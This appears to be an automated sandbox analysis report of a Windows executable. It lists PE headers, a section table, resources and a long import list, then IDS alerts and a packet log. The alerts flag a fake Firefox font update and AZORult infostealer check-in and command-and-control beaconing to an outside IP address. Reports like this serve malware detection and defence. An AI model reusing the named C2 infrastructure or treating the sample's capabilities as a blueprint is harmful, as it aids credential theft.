                                                                                                          TLSH:3886231273E18031FFA7A2739B2AF64556BC7D258123862F13881D7DBD741A2263E763
                                                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........s..R...R...R....C..P.....;.S..._@#.a..._@......_@..g...[j..[...[jo.w...R...r.............#.S..._@'.S...R.k.S.....".S...RichR..
                                                                                                          Icon Hash:aaf3e3e3938382a0
                                                                                                          Entrypoint:0x42800a
                                                                                                          Entrypoint Section:.text
                                                                                                          Digitally signed:false
                                                                                                          Imagebase:0x400000
                                                                                                          Subsystem:windows gui
                                                                                                          Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                                                          DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                                                          Time Stamp:0x5BAFA196 [Sat Sep 29 16:00:22 2018 UTC]
                                                                                                          TLS Callbacks:
                                                                                                          CLR (.Net) Version:
                                                                                                          OS Version Major:5
                                                                                                          OS Version Minor:1
                                                                                                          File Version Major:5
                                                                                                          File Version Minor:1
                                                                                                          Subsystem Version Major:5
                                                                                                          Subsystem Version Minor:1
                                                                                                          Import Hash:afcdf79be1557326c854b6e20cb900a7
                                                                                                          Instruction
                                                                                                          call 00007F1208BE1D5Dh
                                                                                                          jmp 00007F1208BD4B14h
                                                                                                          int3
                                                                                                          int3
                                                                                                          int3
                                                                                                          int3
                                                                                                          int3
                                                                                                          int3
                                                                                                          int3
                                                                                                          int3
                                                                                                          int3
                                                                                                          int3
                                                                                                          int3
                                                                                                          int3
                                                                                                          push edi
                                                                                                          push esi
                                                                                                          mov esi, dword ptr [esp+10h]
                                                                                                          mov ecx, dword ptr [esp+14h]
                                                                                                          mov edi, dword ptr [esp+0Ch]
                                                                                                          mov eax, ecx
                                                                                                          mov edx, ecx
                                                                                                          add eax, esi
                                                                                                          cmp edi, esi
                                                                                                          jbe 00007F1208BD4C9Ah
                                                                                                          cmp edi, eax
                                                                                                          jc 00007F1208BD4FFEh
                                                                                                          bt dword ptr [004C41FCh], 01h
                                                                                                          jnc 00007F1208BD4C99h
                                                                                                          rep movsb
                                                                                                          jmp 00007F1208BD4FACh
                                                                                                          cmp ecx, 00000080h
                                                                                                          jc 00007F1208BD4E64h
                                                                                                          mov eax, edi
                                                                                                          xor eax, esi
                                                                                                          test eax, 0000000Fh
                                                                                                          jne 00007F1208BD4CA0h
                                                                                                          bt dword ptr [004BF324h], 01h
                                                                                                          jc 00007F1208BD5170h
                                                                                                          bt dword ptr [004C41FCh], 00000000h
                                                                                                          jnc 00007F1208BD4E3Dh
                                                                                                          test edi, 00000003h
                                                                                                          jne 00007F1208BD4E4Eh
                                                                                                          test esi, 00000003h
                                                                                                          jne 00007F1208BD4E2Dh
                                                                                                          bt edi, 02h
                                                                                                          jnc 00007F1208BD4C9Fh
                                                                                                          mov eax, dword ptr [esi]
                                                                                                          sub ecx, 04h
                                                                                                          lea esi, dword ptr [esi+04h]
                                                                                                          mov dword ptr [edi], eax
                                                                                                          lea edi, dword ptr [edi+04h]
                                                                                                          bt edi, 03h
                                                                                                          jnc 00007F1208BD4CA3h
                                                                                                          movq xmm1, qword ptr [esi]
                                                                                                          sub ecx, 08h
                                                                                                          lea esi, dword ptr [esi+08h]
                                                                                                          movq qword ptr [edi], xmm1
                                                                                                          lea edi, dword ptr [edi+08h]
                                                                                                          test esi, 00000007h
                                                                                                          je 00007F1208BD4CF5h
                                                                                                          bt esi, 03h
                                                                                                          Programming Language:
                                                                                                          • [ASM] VS2013 build 21005
                                                                                                          • [ C ] VS2013 build 21005
                                                                                                          • [C++] VS2013 build 21005
                                                                                                          • [ C ] VS2008 SP1 build 30729
                                                                                                          • [IMP] VS2008 SP1 build 30729
                                                                                                          • [ASM] VS2013 UPD5 build 40629
                                                                                                          • [RES] VS2013 build 21005
                                                                                                          • [LNK] VS2013 UPD5 build 40629
                                                                                                          NameVirtual AddressVirtual Size Is in Section
                                                                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0xbc0cc0x17c.rdata
                                                                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0xc80000x7207c4.rsrc
                                                                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x7e90000x7134.reloc
                                                                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x92bc00x1c.rdata
                                                                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xa4b500x40.rdata
                                                                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_IAT0x8f0000x884.rdata
                                                                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                          .text0x10000x8dfdd0x8e000310e36668512d53489c005622bb1b4a9False0.5735602580325704data6.675248351711057IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                          .rdata0x8f0000x2fd8e0x2fe00748cf1ab2605ce1fd72d53d912abb68fFalse0.32828818537859006data5.763244005758284IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                          .data0xbf0000x8f740x5200aae9601d920f07080bdfadf43dfeff12False0.1017530487804878data1.1963819235530628IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                          .rsrc0xc80000x7207c40x720800042854e33416cf188c5c67e3f9e06067unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                          .reloc0x7e90000x71340x7200f04128ad0f87f42830e4a6cdbc38c719False0.7617530153508771data6.783955557128661IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                          RT_ICON0xc84e80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                                                                                                          RT_ICON0xc86100x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 0EnglishGreat Britain0.3333333333333333
                                                                                                          RT_ICON0xc88f80x128Device independent bitmap graphic, 16 x 32 x 4, image size 0EnglishGreat Britain0.5
                                                                                                          RT_ICON0xc8a200xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0EnglishGreat Britain0.2835820895522388
                                                                                                          RT_ICON0xc98c80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0EnglishGreat Britain0.37906137184115524
                                                                                                          RT_ICON0xca1700x568Device independent bitmap graphic, 16 x 32 x 8, image size 0EnglishGreat Britain0.23699421965317918
                                                                                                          RT_ICON0xca6d80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishGreat Britain0.13858921161825727
                                                                                                          RT_ICON0xccc800x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishGreat Britain0.25070356472795496
                                                                                                          RT_ICON0xcdd280x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishGreat Britain0.3173758865248227
                                                                                                          RT_DIALOG0xce1900xfcdataEnglishGreat Britain0.6507936507936508
                                                                                                          RT_STRING0xce28c0x594dataEnglishGreat Britain0.3333333333333333
                                                                                                          RT_STRING0xce8200x68adataEnglishGreat Britain0.2747909199522103
                                                                                                          RT_STRING0xceeac0x490dataEnglishGreat Britain0.3715753424657534
                                                                                                          RT_STRING0xcf33c0x5fcdataEnglishGreat Britain0.3087467362924282
                                                                                                          RT_STRING0xcf9380x65cdataEnglishGreat Britain0.34336609336609336
                                                                                                          RT_STRING0xcff940x466dataEnglishGreat Britain0.3605683836589698
                                                                                                          RT_STRING0xd03fc0x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishGreat Britain0.502906976744186
                                                                                                          RT_RCDATA0xd05540x717d18data1.0003108978271484
                                                                                                          RT_GROUP_ICON0x7e826c0x76dataEnglishGreat Britain0.6610169491525424
                                                                                                          RT_GROUP_ICON0x7e82e40x14dataEnglishGreat Britain1.15
                                                                                                          RT_VERSION0x7e82f80xdcdataEnglishGreat Britain0.6181818181818182
                                                                                                          RT_MANIFEST0x7e83d40x3efASCII text, with CRLF line terminatorsEnglishGreat Britain0.5074478649453823
                                                                                                          DLLImport
                                                                                                          WSOCK32.dllWSACleanup, socket, inet_ntoa, setsockopt, ntohs, recvfrom, ioctlsocket, htons, WSAStartup, __WSAFDIsSet, select, accept, listen, bind, closesocket, WSAGetLastError, recv, sendto, send, inet_addr, gethostbyname, gethostname, connect
                                                                                                          VERSION.dllGetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
                                                                                                          WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                                                                                          COMCTL32.dllImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
                                                                                                          MPR.dllWNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
                                                                                                          WININET.dllInternetQueryDataAvailable, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetConnectW
                                                                                                          PSAPI.DLLGetProcessMemoryInfo
                                                                                                          IPHLPAPI.DLLIcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
                                                                                                          USERENV.dllDestroyEnvironmentBlock, UnloadUserProfile, CreateEnvironmentBlock, LoadUserProfileW
                                                                                                          UxTheme.dllIsThemeActive
                                                                                                          KERNEL32.dllDuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, SetCurrentDirectoryW, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentProcess, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, LoadLibraryW, VirtualAlloc, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, GetCurrentThread, CloseHandle, GetFullPathNameW, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteConsoleW, FindClose, SetEnvironmentVariableA
                                                                                                          USER32.dllAdjustWindowRectEx, CopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, SetRect, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, MonitorFromRect, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, UnregisterHotKey, CheckMenuRadioItem, CharLowerBuffW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, LoadImageW, GetClassNameW
                                                                                                          GDI32.dllStrokePath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, GetDeviceCaps, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, DeleteDC, GetPixel, CreateDCW, GetStockObject, GetTextFaceW, CreateFontW, SetTextColor, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, StrokeAndFillPath
                                                                                                          COMDLG32.dllGetOpenFileNameW, GetSaveFileNameW
                                                                                                          ADVAPI32.dllGetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, RegCreateKeyExW, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, AddAce, SetSecurityDescriptorDacl, GetUserNameW, InitiateSystemShutdownExW
                                                                                                          SHELL32.dllDragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
                                                                                                          ole32.dllCoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoSetProxyBlanket, CoCreateInstanceEx, CoInitializeSecurity
                                                                                                          OLEAUT32.dllLoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, RegisterTypeLib, CreateStdDispatch, DispCallFunc, VariantChangeType, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, VariantCopy, VariantClear, OleLoadPicture, QueryPathOfRegTypeLib, RegisterTypeLibForUser, UnRegisterTypeLibForUser, UnRegisterTypeLib, CreateDispTypeInfo, SysAllocString, VariantInit
                                                                                                          Language of compilation systemCountry where language is spokenMap
                                                                                                          EnglishGreat Britain
                                                                                                          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                          2025-01-02T02:27:06.133438+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449730104.21.79.229443TCP
                                                                                                          2025-01-02T02:28:17.624409+01002029465ET MALWARE Win32/AZORult V3.2 Client Checkin M151192.168.2.44985492.63.192.6380TCP
                                                                                                          2025-01-02T02:28:17.624409+01002810276ETPRO MALWARE AZORult CnC Beacon M11192.168.2.44985492.63.192.6380TCP
                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                          Jan 2, 2025 02:27:05.659781933 CET49730443192.168.2.4104.21.79.229
                                                                                                          Jan 2, 2025 02:27:05.659821033 CET44349730104.21.79.229192.168.2.4
                                                                                                          Jan 2, 2025 02:27:05.659883022 CET49730443192.168.2.4104.21.79.229
                                                                                                          Jan 2, 2025 02:27:05.664205074 CET49730443192.168.2.4104.21.79.229
                                                                                                          Jan 2, 2025 02:27:05.664221048 CET44349730104.21.79.229192.168.2.4
                                                                                                          Jan 2, 2025 02:27:06.133238077 CET44349730104.21.79.229192.168.2.4
                                                                                                          Jan 2, 2025 02:27:06.133438110 CET49730443192.168.2.4104.21.79.229
                                                                                                          Jan 2, 2025 02:27:06.145689964 CET49730443192.168.2.4104.21.79.229
                                                                                                          Jan 2, 2025 02:27:06.145714998 CET44349730104.21.79.229192.168.2.4
                                                                                                          Jan 2, 2025 02:27:06.145912886 CET44349730104.21.79.229192.168.2.4
                                                                                                          Jan 2, 2025 02:27:06.185630083 CET49730443192.168.2.4104.21.79.229
                                                                                                          Jan 2, 2025 02:27:06.188524961 CET49730443192.168.2.4104.21.79.229
                                                                                                          Jan 2, 2025 02:27:06.235333920 CET44349730104.21.79.229192.168.2.4
                                                                                                          Jan 2, 2025 02:27:06.639244080 CET44349730104.21.79.229192.168.2.4
                                                                                                          Jan 2, 2025 02:27:06.639291048 CET44349730104.21.79.229192.168.2.4
                                                                                                          Jan 2, 2025 02:27:06.639348030 CET44349730104.21.79.229192.168.2.4
                                                                                                          Jan 2, 2025 02:27:06.639373064 CET44349730104.21.79.229192.168.2.4
                                                                                                          Jan 2, 2025 02:27:06.639401913 CET44349730104.21.79.229192.168.2.4
                                                                                                          Jan 2, 2025 02:27:06.639420033 CET49730443192.168.2.4104.21.79.229
                                                                                                          Jan 2, 2025 02:27:06.639436960 CET44349730104.21.79.229192.168.2.4
                                                                                                          Jan 2, 2025 02:27:06.639446974 CET49730443192.168.2.4104.21.79.229
                                                                                                          Jan 2, 2025 02:27:06.639472961 CET44349730104.21.79.229192.168.2.4
                                                                                                          Jan 2, 2025 02:27:06.639477015 CET49730443192.168.2.4104.21.79.229
                                                                                                          Jan 2, 2025 02:27:06.639486074 CET44349730104.21.79.229192.168.2.4
                                                                                                          Jan 2, 2025 02:27:06.639554024 CET49730443192.168.2.4104.21.79.229
                                                                                                          Jan 2, 2025 02:27:06.639555931 CET44349730104.21.79.229192.168.2.4
                                                                                                          Jan 2, 2025 02:27:06.639604092 CET49730443192.168.2.4104.21.79.229
                                                                                                          Jan 2, 2025 02:27:06.647972107 CET49730443192.168.2.4104.21.79.229
                                                                                                          Jan 2, 2025 02:27:06.647985935 CET44349730104.21.79.229192.168.2.4
                                                                                                          Jan 2, 2025 02:27:06.648094893 CET49730443192.168.2.4104.21.79.229
                                                                                                          Jan 2, 2025 02:27:06.648101091 CET44349730104.21.79.229192.168.2.4
                                                                                                          Jan 2, 2025 02:27:07.408356905 CET4973180192.168.2.4142.250.185.115
                                                                                                          Jan 2, 2025 02:27:07.413197994 CET8049731142.250.185.115192.168.2.4
                                                                                                          Jan 2, 2025 02:27:07.413273096 CET4973180192.168.2.4142.250.185.115
                                                                                                          Jan 2, 2025 02:27:07.413440943 CET4973180192.168.2.4142.250.185.115
                                                                                                          Jan 2, 2025 02:27:07.418271065 CET8049731142.250.185.115192.168.2.4
                                                                                                          Jan 2, 2025 02:27:08.737328053 CET8049731142.250.185.115192.168.2.4
                                                                                                          Jan 2, 2025 02:27:08.737344980 CET8049731142.250.185.115192.168.2.4
                                                                                                          Jan 2, 2025 02:27:08.737385035 CET4973180192.168.2.4142.250.185.115
                                                                                                          Jan 2, 2025 02:27:08.737420082 CET4973180192.168.2.4142.250.185.115
                                                                                                          Jan 2, 2025 02:27:09.984987974 CET49732443192.168.2.4172.217.16.212
                                                                                                          Jan 2, 2025 02:27:09.985074997 CET44349732172.217.16.212192.168.2.4
                                                                                                          Jan 2, 2025 02:27:09.985178947 CET49732443192.168.2.4172.217.16.212
                                                                                                          Jan 2, 2025 02:27:10.006915092 CET49732443192.168.2.4172.217.16.212
                                                                                                          Jan 2, 2025 02:27:10.006953955 CET44349732172.217.16.212192.168.2.4
                                                                                                          Jan 2, 2025 02:27:10.661000967 CET44349732172.217.16.212192.168.2.4
                                                                                                          Jan 2, 2025 02:27:10.661124945 CET49732443192.168.2.4172.217.16.212
                                                                                                          Jan 2, 2025 02:27:10.661159039 CET44349732172.217.16.212192.168.2.4
                                                                                                          Jan 2, 2025 02:27:10.661218882 CET49732443192.168.2.4172.217.16.212
                                                                                                          Jan 2, 2025 02:27:10.997514009 CET49732443192.168.2.4172.217.16.212
                                                                                                          Jan 2, 2025 02:27:10.997553110 CET44349732172.217.16.212192.168.2.4
                                                                                                          Jan 2, 2025 02:27:10.997800112 CET44349732172.217.16.212192.168.2.4
                                                                                                          Jan 2, 2025 02:27:10.997854948 CET49732443192.168.2.4172.217.16.212
                                                                                                          Jan 2, 2025 02:27:11.000647068 CET49732443192.168.2.4172.217.16.212
                                                                                                          Jan 2, 2025 02:27:11.047327995 CET44349732172.217.16.212192.168.2.4
                                                                                                          Jan 2, 2025 02:27:12.687905073 CET44349732172.217.16.212192.168.2.4
                                                                                                          Jan 2, 2025 02:27:12.688077927 CET49732443192.168.2.4172.217.16.212
                                                                                                          Jan 2, 2025 02:27:12.688157082 CET44349732172.217.16.212192.168.2.4
                                                                                                          Jan 2, 2025 02:27:12.688251019 CET49732443192.168.2.4172.217.16.212
                                                                                                          Jan 2, 2025 02:27:12.688524961 CET49732443192.168.2.4172.217.16.212
                                                                                                          Jan 2, 2025 02:27:12.688566923 CET44349732172.217.16.212192.168.2.4
                                                                                                          Jan 2, 2025 02:27:12.688656092 CET49732443192.168.2.4172.217.16.212
                                                                                                          Jan 2, 2025 02:27:15.077704906 CET4973180192.168.2.4142.250.185.115
                                                                                                          Jan 2, 2025 02:27:31.730083942 CET4973980192.168.2.4142.250.185.115
                                                                                                          Jan 2, 2025 02:27:31.734889030 CET8049739142.250.185.115192.168.2.4
                                                                                                          Jan 2, 2025 02:27:31.734983921 CET4973980192.168.2.4142.250.185.115
                                                                                                          Jan 2, 2025 02:27:31.735615015 CET4973980192.168.2.4142.250.185.115
                                                                                                          Jan 2, 2025 02:27:31.740412951 CET8049739142.250.185.115192.168.2.4
                                                                                                          Jan 2, 2025 02:27:32.531635046 CET8049739142.250.185.115192.168.2.4
                                                                                                          Jan 2, 2025 02:27:32.531757116 CET4973980192.168.2.4142.250.185.115
                                                                                                          Jan 2, 2025 02:28:16.932890892 CET4985480192.168.2.492.63.192.63
                                                                                                          Jan 2, 2025 02:28:16.937755108 CET804985492.63.192.63192.168.2.4
                                                                                                          Jan 2, 2025 02:28:16.937824965 CET4985480192.168.2.492.63.192.63
                                                                                                          Jan 2, 2025 02:28:16.939749956 CET4985480192.168.2.492.63.192.63
                                                                                                          Jan 2, 2025 02:28:16.944588900 CET804985492.63.192.63192.168.2.4
                                                                                                          Jan 2, 2025 02:28:17.624355078 CET804985492.63.192.63192.168.2.4
                                                                                                          Jan 2, 2025 02:28:17.624408960 CET4985480192.168.2.492.63.192.63
                                                                                                          Jan 2, 2025 02:28:17.624649048 CET804985492.63.192.63192.168.2.4
                                                                                                          Jan 2, 2025 02:28:17.624686956 CET4985480192.168.2.492.63.192.63
                                                                                                          Jan 2, 2025 02:28:17.624804974 CET4985480192.168.2.492.63.192.63
                                                                                                          Jan 2, 2025 02:28:17.625144005 CET4985880192.168.2.492.63.192.63
                                                                                                          Jan 2, 2025 02:28:17.629575014 CET804985492.63.192.63192.168.2.4
                                                                                                          Jan 2, 2025 02:28:17.629992008 CET804985892.63.192.63192.168.2.4
                                                                                                          Jan 2, 2025 02:28:17.630058050 CET4985880192.168.2.492.63.192.63
                                                                                                          Jan 2, 2025 02:28:17.630192041 CET4985880192.168.2.492.63.192.63
                                                                                                          Jan 2, 2025 02:28:17.634979963 CET804985892.63.192.63192.168.2.4
                                                                                                          Jan 2, 2025 02:28:18.354083061 CET804985892.63.192.63192.168.2.4
                                                                                                          Jan 2, 2025 02:28:18.354199886 CET804985892.63.192.63192.168.2.4
                                                                                                          Jan 2, 2025 02:28:18.354211092 CET804985892.63.192.63192.168.2.4
                                                                                                          Jan 2, 2025 02:28:18.354227066 CET804985892.63.192.63192.168.2.4
                                                                                                          Jan 2, 2025 02:28:18.354259014 CET4985880192.168.2.492.63.192.63
                                                                                                          Jan 2, 2025 02:28:18.354286909 CET4985880192.168.2.492.63.192.63
                                                                                                          Jan 2, 2025 02:28:18.354345083 CET804985892.63.192.63192.168.2.4
                                                                                                          Jan 2, 2025 02:28:18.354357958 CET804985892.63.192.63192.168.2.4
                                                                                                          Jan 2, 2025 02:28:18.354367971 CET804985892.63.192.63192.168.2.4
                                                                                                          Jan 2, 2025 02:28:18.354384899 CET804985892.63.192.63192.168.2.4
                                                                                                          Jan 2, 2025 02:28:18.354393005 CET4985880192.168.2.492.63.192.63
                                                                                                          Jan 2, 2025 02:28:18.354397058 CET804985892.63.192.63192.168.2.4
                                                                                                          Jan 2, 2025 02:28:18.354413033 CET804985892.63.192.63192.168.2.4
                                                                                                          Jan 2, 2025 02:28:18.354414940 CET4985880192.168.2.492.63.192.63
                                                                                                          Jan 2, 2025 02:28:18.354441881 CET4985880192.168.2.492.63.192.63
                                                                                                          Jan 2, 2025 02:28:18.354468107 CET4985880192.168.2.492.63.192.63
                                                                                                          Jan 2, 2025 02:28:18.359052896 CET804985892.63.192.63192.168.2.4
                                                                                                          Jan 2, 2025 02:28:18.359064102 CET804985892.63.192.63192.168.2.4
                                                                                                          Jan 2, 2025 02:28:18.359138012 CET4985880192.168.2.492.63.192.63
                                                                                                          Jan 2, 2025 02:28:18.359257936 CET804985892.63.192.63192.168.2.4
